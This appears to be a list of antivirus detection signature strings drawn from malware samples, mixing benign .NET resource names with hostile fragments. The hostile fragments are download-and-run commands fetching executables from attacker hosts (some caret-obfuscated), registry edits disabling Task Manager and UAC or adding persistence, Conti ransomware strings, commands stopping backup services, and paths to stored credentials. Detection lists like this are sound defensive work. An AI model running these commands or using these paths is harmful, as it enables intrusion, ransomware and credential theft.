- PwmSvc.exe (PEHSTR)
- uiSeAgnt.exe (PEHSTR)
- coreServiceShell.exe (PEHSTR)
- PtSessionAgent.exe (PEHSTR)
- %Mgr.RhY4RfE5Qd:f (PEHSTR_EXT)
- extd.exe (PEHSTR_EXT)
- SecureTeam.Attributes.ObfuscatedByAgileDotNetAttribute (PEHSTR_EXT)
- SmartAssembly.Attributes.PoweredByAttribute (PEHSTR_EXT)
- SecureTeam.Attributes.ObfuscatedByCliSecureAttribute (PEHSTR_EXT)
- Xenocode.Client.Attributes.AssemblyAttributes.ProcessedByXenocode (PEHSTR_EXT)
- CryptoObfuscator.ProtectedWithCryptoObfuscatorAttribute (PEHSTR_EXT)
- NineRays.Obfuscator.Evaluation (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR_EXT)
- System.Runtime.CompilerServices (PEHSTR_EXT)
- DESCryptoServiceProvider (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- CompilationRelaxationsAttribute (PEHSTR_EXT)
- CompilerGeneratedAttribute (PEHSTR_EXT)
- log file.exe (PEHSTR)
- C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb (PEHSTR_EXT)
- LoadDotNetPE.dll (PEHSTR_EXT)
- System.Net (PEHSTR_EXT)
- System.Security.Cryptography.AesCryptoServiceProvider (PEHSTR_EXT)
- hOOWd989DTOHFEOtZr.dVHUYZkf5VVcnHC4cP (PEHSTR_EXT)
- @certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe (PEHSTR)
- #copy /y wget.exe %windir%\system32\ (PEHSTR)
- taskkill /im svshosb.exe -f (PEHSTR)
- rreg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v '"DisableTaskMgr" /d 1 /t REG_DWORD /f (PEHSTR)
- $wget http://down.us-hack.ru/agwl.exe (PEHSTR)
- "C:\Windows\Tasks\hook\svchosts.exe (PEHSTR)
- :\Windows\Temp\ (PEHSTR_EXT)
- PingCastle.Scanners (PEHSTR_EXT)
- root\cimv2 (PEHSTR_EXT)
- worlorderbillions.top (PEHSTR_EXT)
- .vm_sec (PEHSTR_EXT)
- .themida (PEHSTR_EXT)
- /checkprotection (PEHSTR_EXT)
- \Login Data (PEHSTR_EXT)
- \Default\Login Data (PEHSTR_EXT)
- \mail (PEHSTR_EXT)
- \NETGATE Technologies\BlackHawk (PEHSTR_EXT)
- qemu-ga.exe (PEHSTR)
- iplogger.org (PEHSTR)
- track/glqkhzmp?sub= (PEHSTR)
- \postbackstat.exe (PEHSTR)
- \updater3.exe (PEHSTR)
- dlshsvc.exe (PEHSTR)
- ftshost.exe (PEHSTR)
- mshost.exe (PEHSTR)
- mstray.exe (PEHSTR)
- \\.\mailslot\f2874324320878 (PEHSTR)
- ladd HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0x00000000 /f (PEHSTR)
- $add %s\%s /v %s /t REG_SZ /d "%s" /f (PEHSTR)
- ftsri.php?get&exe (PEHSTR)
- fsi.php?get&exe (PEHSTR)
- allnewsmedia.webatu.com (PEHSTR)
- lovecatalog.comlu.com (PEHSTR)
- yourssagregator.comlu.com (PEHSTR)
- C:\myapp.exe (PEHSTR_EXT)
- \MyApp.log (PEHSTR_EXT)
- //pastebin.com/raw/ (PEHSTR)
- 5) / (MACROHSTR_EXT)
- 5)) / (MACROHSTR_EXT)
- 5 / ( (MACROHSTR_EXT)
- 5 / Int( (MACROHSTR_EXT)
- Software\DownloadManager\Passwords\ (PEHSTR_EXT)
- \Roaming\FlashFXP\3quick.dat (PEHSTR_EXT)
- \Trillian\users\global\accounts.dat (PEHSTR_EXT)
- Software\RimArts\B2\Settings (PEHSTR_EXT)
- \Roaming\Postbox\profiles.ini (PEHSTR_EXT)
- \%insfolder%\%insname% (PEHSTR_EXT)
- 5.189.134.216 (PEHSTR_EXT)
- bdss=Bit Defender,onlinent=QHeal,bdagent=BD Agent,msseces=MS Essentials,fssm32=FSecure,avp=Kaspersky (PEHSTR_EXT)
- Debug\thnaviwa.pdb (PEHSTR_EXT)
- screenCapture (PEHSTR)
- qreg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f (PEHSTR)
- lreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f (PEHSTR)
- }reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f (PEHSTR)
- reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d %homedrive%\COVID-19\Update.vbs /f (PEHSTR)
- yreg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d %homedrive%\COVID-19\end.exe /f (PEHSTR)
- Your Computer Has Been Trashed (PEHSTR)
- cystum.Sucuryty.Sryp (PEHSTR)
- ]source\repos\Windows Update Certifier\Windows Update Certifier\obj\Debug\Update Certifier.pdb (PEHSTR)
- TransactionalFileManager.dll (PEHSTR_EXT)
- plDropnF.exe (PEHSTR)
- Network Adapters.dll (PEHSTR)
- 2\ConfigurationFiles\obj\Debug\Network Adapters.pdb (PEHSTR)
- Microsoft.VisualBasic.ApplicationServices (PEHSTR_EXT)
- Phoenix.Resources.resources (PEHSTR_EXT)
- BBMS.FormCustomerInfo.resources (PEHSTR_EXT)
- BBMS.FormDonorInfo.resources (PEHSTR_EXT)
- BBMS.FormDonorUpdate.resources (PEHSTR_EXT)
- BBMS.FormLogin.resources (PEHSTR_EXT)
- BBMS.FormMain.resources (PEHSTR_EXT)
- BBMS.FormReportViewer.resources (PEHSTR_EXT)
- BBMS.FormStockList.resources (PEHSTR_EXT)
- BBMS.FormUserAccount.resources (PEHSTR_EXT)
- BBMS.Resources.resources (PEHSTR_EXT)
- BBMS.yyt1.resources (PEHSTR_EXT)
- C:\TEMP\haleng.exe (PEHSTR_EXT)
- http://uehge4g6Gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 (PEHSTR_EXT)
- D:\workspace\workspace_c\Gj7eU93o7gGhg_19\Release\Gj7eU93o7gGhg_19.pdb (PEHSTR_EXT)
- jfiag3g_gg.exe (PEHSTR_EXT)
- fj4ghga23_fsa.txt (PEHSTR_EXT)
- Combine (PEHSTR_EXT)
- System.Drawing.Bitmap (PEHSTR)
- $WebBrowserDocumentCompletedEventArgs (PEHSTR)
- DESCryptoServiceProvider (PEHSTR)
- BaiTapThietKeForm.Properties.Resources (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR)
- C:\Users\xxx\Desktop\IPFAJNYPROGRAM\Client\Client\obj\x86\Release\Client.pdb (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- ModelsCore.Properties.Resources (PEHSTR_EXT)
- Lerlibro_INC.My.Resources (PEHSTR_EXT)
- bytesToDecompress (PEHSTR_EXT)
- Mini_Game_Center.My (PEHSTR_EXT)
- Mini_Game_Center.snake.resources (PEHSTR_EXT)
- MathDrill_01.My (PEHSTR_EXT)
- CurrentVersion\Explorer\Shell Folders (PEHSTR_EXT)
- \AudioApp (PEHSTR_EXT)
- /C rund (PEHSTR_EXT)
- \Downloads\ (PEHSTR_EXT)
- jazk.dll (PEHSTR_EXT)
- ExecuteNonQuery (PEHSTR_EXT)
- [poldata5].[DeleteExistingReminder] (PEHSTR_EXT)
- poldata5.UpdateSnooze (PEHSTR_EXT)
- /This p (PEHSTR_EXT)
- .tsxt (PEHSTR_EXT)
- .rsrq (PEHSTR_EXT)
- Io.xy (PEHSTR_EXT)
- DatabaseManager.A.resources (PEHSTR_EXT)
- DatabaseManager.FrmMenu.resources (PEHSTR_EXT)
- FolderSearcher.Form1.resources (PEHSTR_EXT)
- System.Text (PEHSTR_EXT)
- AthleticClubManagementSystem.Resources (PEHSTR_EXT)
- RecordBgySystem.My.Resources (PEHSTR_EXT)
- Secure.Messenger.WpfHost (PEHSTR)
- ApartmanOto.pdb (PEHSTR_EXT)
- IHMVB.My (PEHSTR)
- CompareString (PEHSTR_EXT)
- CompareMethod (PEHSTR_EXT)
- BaiTapThietKeForm.frmBai1.resources (PEHSTR_EXT)
- ComputeMatrix (PEHSTR_EXT)
- TVqQAAMAAAAEAAAA//8AALg (PEHSTR_EXT)
- HttpCore.Agent (PEHSTR_EXT)
- https://www.example.com/Default (PEHSTR_EXT)
- \Program (PEHSTR_EXT)
- Espionage_Sorter.My.Resources (PEHSTR_EXT)
- SqlFormatter.Properties.Resources (PEHSTR_EXT)
- MandelbrotExplorer.My.Resources (PEHSTR_EXT)
- File_System_Controls.My.Resources (PEHSTR_EXT)
- SharpDevelop Projects\Tyxif\Tyxif\obj\Debug\Tyxif.pdb (PEHSTR_EXT)
- RangePartition.dll (PEHSTR_EXT)
- Bunifu.UI.Bunifu_Button (PEHSTR_EXT)
- SmartAssembly.Attributes (PEHSTR_EXT)
- System.IO.Compression (PEHSTR_EXT)
- Goriot.Controls (PEHSTR_EXT)
- mscoree.dll (PEHSTR_EXT)
- costura.costura.dll.compressed (PEHSTR_EXT)
- ATMManager.Update.resources (PEHSTR_EXT)
- CompareExchange (PEHSTR)
- *DeltaEngine.Properties.Resources.resources (PEHSTR)
- .Properties.Resources (PEHSTR_EXT)
- ExpenseManager.Properties.Resources (PEHSTR_EXT)
- rozenbayn.Form (PEHSTR_EXT)
- .resources (PEHSTR_EXT)
- projetor.Form (PEHSTR_EXT)
- Form1.resources (PEHSTR_EXT)
- Form2.resources (PEHSTR_EXT)
- Form3.resources (PEHSTR_EXT)
- Tetris.Desktop.GameOver (PEHSTR)
- System.CodeDom.Compiler (PEHSTR_EXT)
- ServiceHub.Host (PEHSTR_EXT)
- 2.4.227.2020 (PEHSTR_EXT)
- 2.4.227+e4076a6e7d.RR (PEHSTR_EXT)
- Blit.exe (PEHSTR)
- WERGHGHJHJF.pdb (PEHSTR_EXT)
- FormSplashScreen (PEHSTR_EXT)
- \Roaming\TReplaceokReplaceenReplaces.tReplacex (PEHSTR_EXT)
- %appdata%\discord\ (PEHSTR_EXT)
- 99.0.4832.0 (PEHSTR_EXT)
- Aspiring_Rookie.Resources.resources (PEHSTR_EXT)
- List_omdre.exe (PEHSTR_EXT)
- Lime_AsyncClientSpoofer.exe (PEHSTR_EXT)
- Lime_AsyncClientSpoofer.Consumers (PEHSTR_EXT)
- bitclient1.exe (PEHSTR_EXT)
- WindowsFormsApp76.Properties (PEHSTR_EXT)
- Lime_async.Definitions (PEHSTR_EXT)
- Lime_async.Specifications (PEHSTR_EXT)
- Lime_Agent (PEHSTR_EXT)
- Lime_Agent.exe (PEHSTR_EXT)
- aaa_TouchMeNot_\aaa_TouchMeNot_.txt (PEHSTR_EXT)
- CONTI_README.txt (PEHSTR_EXT)
- cmd.exe /c net stop VeeamBrokerSvc /y (PEHSTR_EXT)
- cmd.exe /c net stop mfefire /y (PEHSTR_EXT)
- cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y (PEHSTR_EXT)
- cmd.exe /c net stop VeeamEnterpriseManagerSvc (PEHSTR_EXT)
- C:\xampp\htdocs\Cryptor\ (PEHSTR_EXT)
- \Loader\Release\Loader.pdb (PEHSTR_EXT)
- G*.eV (SNID)
- System.ComponentModel (PEHSTR_EXT)
- 24032.3018.0.1 (PEHSTR_EXT)
- CompressionMode (PEHSTR_EXT)
- ByMynix.xyz (PEHSTR_EXT)
- LightWatch.My.Resources (PEHSTR_EXT)
- Forge.Templating.My.Resources (PEHSTR_EXT)
- CompilerProject (PEHSTR_EXT)
- Decompress (PEHSTR_EXT)
- PSQS.Properties.Resources.resources (PEHSTR_EXT)
- 97.0.1.8082 (PEHSTR_EXT)
- hilal.Properties.Resources (PEHSTR_EXT)
- Reload.My.Resources (PEHSTR_EXT)
- Reload.Reload.resources (PEHSTR_EXT)
- file:/// (PEHSTR_EXT)
- Owl.Core.My.Resources (PEHSTR_EXT)
- ASManager2017.My.Resources (PEHSTR_EXT)
- MNJKolK87.pdb (PEHSTR_EXT)
- /tedburke/CommandCam/master/CommandCam.exe (PEHSTR_EXT)
- Trying create screenshot from camera (PEHSTR_EXT)
- /LimerBoy/hackpy/master/modules/audio.zip (PEHSTR_EXT)
- Failed to decrypt file. Wrong password! (PEHSTR_EXT)
- \keylogs (PEHSTR_EXT)
- /master/Stealer/Stealer/modules/Sodium.dll (PEHSTR_EXT)
- /TelegramRAT/core/libs/AudioSwitcher.AudioApi.dll (PEHSTR_EXT)
- LCD.Properties (PEHSTR_EXT)
- 54.65.13.91 (PEHSTR_EXT)
- Application Data\server.txt (PEHSTR_EXT)
- kaskdk.hissssa (MACROHSTR_EXT)
- ko4d = "tp://%748237%728748@j.mp/" (MACROHSTR_EXT)
- tranquvis.Properties.Resources.resources (PEHSTR_EXT)
- .onion (PEHSTR_EXT)
- https://contirecovery.info (PEHSTR_EXT)
- cleaner_.log (PEHSTR_EXT)
- net stop WinREAgent (PEHSTR_EXT)
- net stop RecoveryAgent (PEHSTR_EXT)
- p^i^N^g^.^e^X^E (MACROHSTR_EXT)
- ^h^t^t^p^s^:^/^/^c^a^n^a^d^a^c^i^g^a^r^s^u^p^p^l^i^e^s^.^c^o^m^/^w^p^-^c^o^n^t^e^n^t^/^u^p^l^o^a^d^s^/^2^0^1^8^/^0^5^/^f^i^l^e^s^/^a^n^o^.^e^x^e (MACROHSTR_EXT)
- %TEMP%^\^f^i^l^e^s^.^e^x^e (MACROHSTR_EXT)
- s^t^a^r^t^ ^ ^ %TEMP%^\^f^i^l^e^s^.^e^x^e (MACROHSTR_EXT)
- Application.Wait (Now + TimeValue("0:00:05")) (MACROHSTR_EXT)
- http://asdcqwdwqx.gq/liverpool-fc-news/features/ (PEHSTR_EXT)
- UserAgent: (PEHSTR_EXT)
- Select * from Win32_ComputerSystem (PEHSTR_EXT)
- SbieDll.dll (PEHSTR_EXT)
- CreateObject("WScript.Shell").Run (PEHSTR_EXT)
- Sof#tware\Micr#osoft\Win#dows\Curr#entVer#sion\#R#u#n\ (PEHSTR_EXT)
- AltiumManager.Resources.resources (PEHSTR_EXT)
- AltiumManager.Platinium.resources (PEHSTR_EXT)
- QuanLyDiemSV.Resources.resources (PEHSTR_EXT)
- GraphicsUtility.Form1.resources (PEHSTR_EXT)
- ClumsyProof.My.Resources (PEHSTR_EXT)
- MeteorUiLib.My.Resources (PEHSTR_EXT)
- MainWindow.Resources.resources (PEHSTR_EXT)
- discordapp.com/attachments (PEHSTR_EXT)
- qfa/ti_0ti_ (PEHSTR_EXT)
- LamdaX.My.Resources (PEHSTR_EXT)
- LamdaX.Hyatt.resources (PEHSTR_EXT)
- IExpando.Plug (PEHSTR_EXT)
- Foldz.My.Resources (PEHSTR_EXT)
- MonopolySim.My.Resources (PEHSTR_EXT)
- CheckingAccount.My.Resources (PEHSTR_EXT)
- QLGR_GUI.My.Resources (PEHSTR_EXT)
- Windowssettings.Settings.resources (PEHSTR_EXT)
- BasicClassValidation.My.Resources (PEHSTR_EXT)
- MinesweeperAdvance.My.Resources (PEHSTR_EXT)
- FootballTeams.My.Resources (PEHSTR_EXT)
- MDIWindowManager.My.Resources (PEHSTR_EXT)
- Patch.My.Resources (PEHSTR_EXT)
- test404.My.Resources (PEHSTR_EXT)
- LibraryManagementSystem.My.Resources (PEHSTR_EXT)
- FormEditor.My.Resources (PEHSTR_EXT)
- SoccerStatsForAllProject.My.Resources (PEHSTR_EXT)
- .g.resources (PEHSTR_EXT)
- c:\sri\Message.txt (PEHSTR_EXT)
- PTM.MainForm.resources (PEHSTR_EXT)
- PTM.OPIC.resources (PEHSTR_EXT)
- JoooO.STUB.OoooJ.My.Resources (PEHSTR_EXT)
- UI.My.Resources (PEHSTR_EXT)
- Timeseries.My.Resources (PEHSTR_EXT)
- GoWEditor.My.Resources (PEHSTR_EXT)
- "tp://1230912489%1230192309@j.mp/" (MACROHSTR_EXT)
- "tp://1230948%1230948@j.mp/" (MACROHSTR_EXT)
- "23bbsdajs821" (MACROHSTR_EXT)
- =opera.x+opera.y+textfileforyou.z+textfileforyou.d+hi.openmarket+hi.xxx+hi.k+hi.t (MACROHSTR_EXT)
- textfilestuff.mosuf.tagendfunction (MACROHSTR_EXT)
- PersonnelTracking.Properties.Resources.resources (PEHSTR_EXT)
- LibInUse.My.Resources (PEHSTR_EXT)
- Software.My.Resources (PEHSTR_EXT)
- FileCopier.Properties.Resources (PEHSTR_EXT)
- CriticalAttribute.Resources.resources (PEHSTR_EXT)
- MultiToken.Resources (PEHSTR_EXT)
- q9gcjs5cdzu8afy5yun73g7sbu286um (PEHSTR_EXT)
- BookstoreManagement.GUI.My.Resources (PEHSTR_EXT)
- //transfer.sh (PEHSTR_EXT)
- GET ///RguhsT/accept.php?a= (PEHSTR)
- local.foo.com (PEHSTR)
- AMS.My (PEHSTR_EXT)
- AMS.Add_Course_Teacher_Student.resources (PEHSTR_EXT)
- AMS.AddUserFrm.resources (PEHSTR_EXT)
- AMS.AnsiCharMarshaler.resources (PEHSTR_EXT)
- AMS.Course_Registration.resources (PEHSTR_EXT)
- AMS.GPA_Academic_History_Look_Up.resources (PEHSTR_EXT)
- AMS.LogIn.resources (PEHSTR_EXT)
- AMS.Main_Menu.resources (PEHSTR_EXT)
- AMS.Resources.resources (PEHSTR_EXT)
- PaCman.AboutBox1.resources (PEHSTR_EXT)
- PaCman.Controller_MainForm.resources (PEHSTR_EXT)
- PaCman.Properties.Resources.resources (PEHSTR_EXT)
- PaCman.View.resources (PEHSTR_EXT)
- Factor.Factor.resources (PEHSTR_EXT)
- ArrangePicture.Form1.resources (PEHSTR_EXT)
- ITokenReader.frmITokenReader.resources (PEHSTR_EXT)
- ITokenReader.frmDestino.resources (PEHSTR_EXT)
- ITokenReader.frmPessoa.resources (PEHSTR_EXT)
- ITokenReader.frmPrincipal.resources (PEHSTR_EXT)
- ITokenReader.frmSobre.resources (PEHSTR_EXT)
- ITokenReader.frmTramitando.resources (PEHSTR_EXT)
- VehicleManager.ListView.resources (PEHSTR_EXT)
- VehicleManager.MainForm.resources (PEHSTR_EXT)
- ITokenReader.Properties.Resources.resources (PEHSTR_EXT)
- ITokenReader.Resources.resources (PEHSTR_EXT)
- VehicleManager.TypeControl.resources (PEHSTR_EXT)
- SYSTEM_BNHS.vb.Block64.resources (PEHSTR_EXT)
- BNHSCommand (PEHSTR_EXT)
- Agent.exe (PEHSTR_EXT)
- ConfuserEx v0.6.0 (PEHSTR_EXT)
- ISO2022Modes.Search.resources (PEHSTR_EXT)
- ISO2022Modes.crystal.resources (PEHSTR_EXT)
- ISO2022Modes.Kin.resources (PEHSTR_EXT)
- ISO2022Modes.frmMain.resources (PEHSTR_EXT)
- ISO2022Modes.AddInfo.resources (PEHSTR_EXT)
- ISO2022Modes.UpdateInfo.resources (PEHSTR_EXT)
- ISO2022Modes.Deleteinfo.resources (PEHSTR_EXT)
- ISO2022Modes.Properties.Resources.resources (PEHSTR_EXT)
- ISO2022Modes.product.resources (PEHSTR_EXT)
- ISO2022Modes.view.resources (PEHSTR_EXT)
- rkQuAtdP2v2DC8XaJSe (PEHSTR_EXT)
- SchoolManagementSystem.Properties (PEHSTR_EXT)
- 1ese92VWgsRJFT1srbgo5SFPIMk+jbLKTQ5ewNnKClI5csh6i5HItc6B40fr9wVIfYpUxb63Gvz4DGxgcD7qn2prJsnnb2tpZ+3zDqOUhcoTOoF0F7KDoLSLZDP3aQ5cAqh/bcGXWvQpfVDZoDC66W+BXEQw8VkWZAHPNKFE6WCHrFZSZRNnLmsFE (PEHSTR)
- ServerComputer (PEHSTR_EXT)
- System.Threading (PEHSTR_EXT)
- ParseXmlDescription (PEHSTR_EXT)
- SetCompatibleTextRenderingDefault (PEHSTR_EXT)
- System.Security.AccessControl (PEHSTR_EXT)
- commandLine (PEHSTR_EXT)
- System.Reflection (PEHSTR_EXT)
- System.Drawing (PEHSTR_EXT)
- System.Security.Principal (PEHSTR_EXT)
- System.Runtime.Remoting (PEHSTR_EXT)
- System.Reflection.Emit (PEHSTR_EXT)
- SoapName.dll (PEHSTR_EXT)
- SoapName.My.Resources (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
- CrazyTetris.Form1.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel2.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel3.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel4.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel5CHIMNEY.resources (PEHSTR_EXT)
- CrazyTetris.frmLevelSelect.resources (PEHSTR_EXT)
- CrazyTetris.frmMainMenu.resources (PEHSTR_EXT)
- CrazyTetris.frmSettings.resources (PEHSTR_EXT)
- CrazyTetris.GameForm.resources (PEHSTR_EXT)
- CrazyTetris.HighScoreForm.resources (PEHSTR_EXT)
- CrazyTetris.MainMenu.resources (PEHSTR_EXT)
- CrazyTetris.Resources.resources (PEHSTR_EXT)
- CrazyTetris.SplashScreen.resources (PEHSTR_EXT)
- \resources\Images\tut.png (PEHSTR_EXT)
- TankGame.StartUp.resources (PEHSTR_EXT)
- TankGame.Resources.resources (PEHSTR_EXT)
- TankGame.MultipleBlocks.resources (PEHSTR_EXT)
- TankGame.QuickStart.resources (PEHSTR_EXT)
- IEnumSTORECATEGORYINSTA.exe (PEHSTR_EXT)
- get_IsCompleted (PEHSTR_EXT)
- RecordBgySystem.Res_delete.resources (PEHSTR_EXT)
- public.class.Main.HelloWorld.module13 (PEHSTR_EXT)
- MKMNnN988.Properties.Resources.resources (PEHSTR_EXT)
- Chuang.Printer.ClientUninstall (PEHSTR_EXT)
- Delo2Mail.My.Resources (PEHSTR_EXT)
- Delo2Mail.Baidu (PEHSTR_EXT)
- ShellExecute (PEHSTR_EXT)
- kernel32.dll (PEHSTR_EXT)
- HotelMgmtSystem.Booking.resources (PEHSTR_EXT)
- HotelMgmtSystem.loginForm.resources (PEHSTR_EXT)
- HotelMgmtSystem.Properties.Resources.resources (PEHSTR_EXT)
- System.Drawing.Bitmap (PEHSTR_EXT)
- ComponentResourceManager (PEHSTR_EXT)
- KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator (PEHSTR_EXT)
- My.Settings (PEHSTR_EXT)
- Dispose__Instance__ My.MyWpfExtenstionModule.Windows (PEHSTR_EXT)
- FionnCharacterSheet.Welcome.resources (PEHSTR_EXT)
- FionnCharacterSheet.LCDEmulatorFrm.resources (PEHSTR_EXT)
- FionnCharacterSheet.Resources.resources (PEHSTR_EXT)
- FionnCharacterSheet.SkillsFocuses.resources (PEHSTR_EXT)
- FionnCharacterSheet.MultipleBlocks.resources (PEHSTR_EXT)
- http://DATABASE AQUI/ddos.txt (PEHSTR_EXT)
- http://DATABASE AQUI/geoip.txt (PEHSTR_EXT)
- http://DATABASE AQUI/sniffer.txt (PEHSTR_EXT)
- http://DATABASE AQUI/database.txt (PEHSTR_EXT)
- http://DATABASE AQUI/chat.txt (PEHSTR_EXT)
- http://DATABASE AQUI/project.txt (PEHSTR_EXT)
- HTTPService.exe (PEHSTR_EXT)
- cmd /c taskkill /f /t /im files\s-irecovery.exe (PEHSTR_EXT)
- http://ih8sn0w.com (PEHSTR_EXT)
- \files\llb.3gs.dfu (PEHSTR_EXT)
- iBooty.Resources.resources (PEHSTR_EXT)
- ms2mz.KeyWriter.resources (PEHSTR_EXT)
- get_UseCompatibleTextRendering (PEHSTR_EXT)
- broke_mobile.My.Resources (PEHSTR_EXT)
- set_UpdateCommand (PEHSTR_EXT)
- LoginScreen_Load (PEHSTR_EXT)
- CommitUrlCacheEntryW (PEHSTR_EXT)
- get_ExecutablePath (PEHSTR_EXT)
- get_net_http_content_buffersize_exceeded (PEHSTR_EXT)
- get_net_http_client_send_completed (PEHSTR_EXT)
- get_net_http_operation_started (PEHSTR_EXT)
- Lerlibro_INC.Se1.resources (PEHSTR_EXT)
- Lerlibro_INC.fnt1.resources (PEHSTR_EXT)
- Lerlibro_INC.frmHRPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmMISPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmAccountingPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmSalesPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmMain.resources (PEHSTR_EXT)
- Lerlibro_INC.Resources.resources (PEHSTR_EXT)
- Lerlibro_INC.ucUsers.resources (PEHSTR_EXT)
- Lerlibro_INC.Baidu.resources (PEHSTR_EXT)
- 5.172.39.25/browser.php (PEHSTR_EXT)
- https://ostoja.tk/browser.php (PEHSTR_EXT)
- TOJA_Browser.Properties.Resources (PEHSTR_EXT)
- InvokeMethod.InvokeMethod (PEHSTR_EXT)
- TripleDESCryptoServiceProvider (PEHSTR_EXT)
- CMS.Resources.resources (PEHSTR_EXT)
- CMS.Hett.resources (PEHSTR_EXT)
- LibraryManagementSystem.Resources.resources (PEHSTR_EXT)
- Studioborne.Resources (PEHSTR_EXT)
- ITypeComp (PEHSTR_EXT)
- Destinationd.Resources.resources (PEHSTR_EXT)
- Destinationd.Underlying.resources (PEHSTR_EXT)
- BestFitMappingAttribute.EnumeratorSimple (PEHSTR_EXT)
- Tienda.Resources (PEHSTR_EXT)
- Tienda.Util (PEHSTR_EXT)
- Tienda.Util.resources (PEHSTR_EXT)
- PTSoft_MailServer.Officer (PEHSTR_EXT)
- PTSoft_MailServer.Resources (PEHSTR_EXT)
- security.cer (PEHSTR_EXT)
- message.txt (PEHSTR_EXT)
- ocrvb.SDP (PEHSTR_EXT)
- ocrvb.Resources (PEHSTR_EXT)
- User-Agent: Uploador (PEHSTR_EXT)
- scr=up (PEHSTR_EXT)
- x%.2x%.2x%.2x%.2x%.2x%.2x (PEHSTR_EXT)
- Content-Type: application/octet-stream (PEHSTR_EXT)
- Content-Type: multipart/form-data (PEHSTR_EXT)
- \FileZilla\sitemanager.xml (PEHSTR_EXT)
- \.purple\accounts.xml (PEHSTR_EXT)
- \Wcx_ftp.ini (PEHSTR_EXT)
- \winscp.ini (PEHSTR_EXT)
- .edom SOD ni nur eb tonnac margorp sihT! (PEHSTR_EXT)
- CartoonersFileViewerProgram.Se1 (PEHSTR_EXT)
- Cartoons.exe (PEHSTR_EXT)
- CartoonersFileViewerProgram.Resources (PEHSTR_EXT)
- cstoon.smb (PEHSTR_EXT)
- AthleticClubManagementSystem.SplashScreen1.resources (PEHSTR_EXT)
- BMS1.Resources (PEHSTR_EXT)
- BMS1.Sheet1 (PEHSTR_EXT)
- http://www.tempuri.org/DataSet1.xsd (PEHSTR_EXT)
- SqlCommand (PEHSTR_EXT)
- ExecuteReader (PEHSTR_EXT)
- Lion_Match_Employee_Management_System.HBT (PEHSTR_EXT)
- Lion_Match_Employee_Management_System.Resources (PEHSTR_EXT)
- Stub62.Resources (PEHSTR_EXT)
- Praneethmadush@gmail.com (PEHSTR_EXT)
- Sales_Dashboard.Resources.resource (PEHSTR_EXT)
- LibraryItems.Properties.Resources.resource (PEHSTR_EXT)
- Medical_.Stock10.resources (PEHSTR_EXT)
- Medical_.Expiry11.resources (PEHSTR_EXT)
- PickerHost.g.resources (PEHSTR_EXT)
- Pizza_App_User.Resources.resources (PEHSTR_EXT)
- SE_GUI.Resources (PEHSTR_EXT)
- SE_GUI.AdminPage.resources (PEHSTR_EXT)
- RequestBtn.Iconimage (PEHSTR_EXT)
- PuppetMaster.Ward.resources (PEHSTR_EXT)
- tcp://localhost: (PEHSTR_EXT)
- SignatureDeformatter.IPermission (PEHSTR_EXT)
- Data Source=(localdb)\MSSQLLocalDB;Initial Catalog=mdmsDB;Integrated Security=True;Pooling=False (PEHSTR_EXT)
- WinClient.frmlogin.resources (PEHSTR_EXT)
- Network_Printer.txt (PEHSTR_EXT)
- set_SelectCommand (PEHSTR_EXT)
- MHMS.Form1.resources (PEHSTR_EXT)
- MHMS.frmSystemInfo.resources (PEHSTR_EXT)
- Medical_Laboratory.Result_1.resources (PEHSTR_EXT)
- ComputeHash (PEHSTR_EXT)
- DnEaz.Properties (PEHSTR_EXT)
- GetScriptBlock (PEHSTR_EXT)
- TicTacToe.TicTacToe.resources (PEHSTR_EXT)
- TicTacToe.My.Resources (PEHSTR_EXT)
- TicTacToe.frmIntro.resources (PEHSTR_EXT)
- cmdHard_Click (PEHSTR_EXT)
- cmdGet1And8And16_Click (PEHSTR_EXT)
- VB_blackjack.Base_Table.resources (PEHSTR_EXT)
- System.Runtime.Versioning (PEHSTR_EXT)
- .online/base/ (PEHSTR_EXT)
- get_spdrwgui_exe (PEHSTR_EXT)
- 2.22.11.11 (PEHSTR_EXT)
- shutdowntimer.Properties.Resources (PEHSTR_EXT)
- CrackerBarrelGame.Resources (PEHSTR_EXT)
- SecurityContextRunData.Resources (PEHSTR_EXT)
- Softworks_Rhino.Resources (PEHSTR_EXT)
- EasyScreenshotCapture.Form1.resources (PEHSTR_EXT)
- StestWinForm.Properties.Resources (PEHSTR_EXT)
- Painter.Properties.Resources (PEHSTR_EXT)
- SafeRegistryHandle.IPermission (PEHSTR_EXT)
- E@\accH (PEHSTR_EXT)
- EDess. (PEHSTR_EXT)
- EraseExpressionFromHistoryScreen (PEHSTR_EXT)
- JustExecuted (PEHSTR_EXT)
- Debug.Assert (VBA.Shell(manpower3)) (MACROHSTR_EXT)
- man2 = icecream1.jack1.Tag (MACROHSTR_EXT)
- Shell k.myvalue + k.myvalue2 (MACROHSTR_EXT)
